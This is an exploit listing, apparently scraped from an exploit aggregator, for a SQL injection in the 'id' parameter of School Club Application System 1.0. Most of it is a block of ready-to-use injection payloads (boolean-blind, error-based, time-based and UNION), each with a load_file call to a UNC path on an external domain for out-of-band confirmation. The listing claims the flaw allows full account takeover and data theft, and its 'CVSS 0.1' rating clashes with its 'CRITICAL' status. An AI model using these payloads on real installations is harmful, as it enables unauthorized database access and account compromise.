Exploit for School Club Application System 1.0 SQL Injection

Name: Exploit for School Club Application System 1.0 SQL Injection
Rating: 5 (198 reviews)
2022-04-07 | CVSS 0.1
## https://sploitus.com/exploit?id=PACKETSTORM:166614
## Title: School Club Application System v1.0 SQLi  
## Author: nu11secur1ty  
## Date: 04.07.2022  
## Vendor: https://www.sourcecodester.com/users/tips23  
## Software: https://www.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html  
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application  
  
## Description:  
The `id` parameter appears to be vulnerable to three types of SQL  
injection attacks.  
The payload '+(select  
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+'  
was submitted in the id parameter.  
This payload injects a SQL sub-query that calls MySQL's load_file  
function with a UNC file path that references a URL on an external  
domain.  
The application interacted with that domain, indicating that the  
injected SQL query was executed.  
The attacker can take administrator account control and also of all  
accounts on this system, also the malicious user can download all  
information about this system.  
  
Status: CRITICAL  
  
[+] Payloads:  
  
```mysql  
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: page=clubs/view_details&id=2'+(select  
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''  
OR NOT 2914=2914-- erOW  
  
Type: error-based  
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or  
GROUP BY clause (FLOOR)  
Payload: page=clubs/view_details&id=2'+(select  
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''  
OR (SELECT 2308 FROM(SELECT COUNT(*),CONCAT(0x7176787a71,(SELECT  
(ELT(2308=2308,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM  
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VAfL  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=clubs/view_details&id=2'+(select  
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''  
AND (SELECT 8537 FROM (SELECT(SLEEP(5)))TWcu)-- jivn  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 8 columns  
Payload: page=clubs/view_details&id=2'+(select  
load_file('\\\\8dmu6ajx1qrgicpg5fp5d8637udn1gp7svjia6z.sourcecodester.com/php/15266/school-club-application-system-phpoop-free-source-code.html\\slr'))+''  
UNION ALL SELECT  
CONCAT(0x7176787a71,0x7468764e617048694a74717a4f53734a6956786e7a4a56774b48427a7645474c414847756f704641,0x717a6b7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL--  
-  
---  
  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/School-Club-Application)  
  
## Proof and Exploit:  
[href](https://streamable.com/lpwxr4)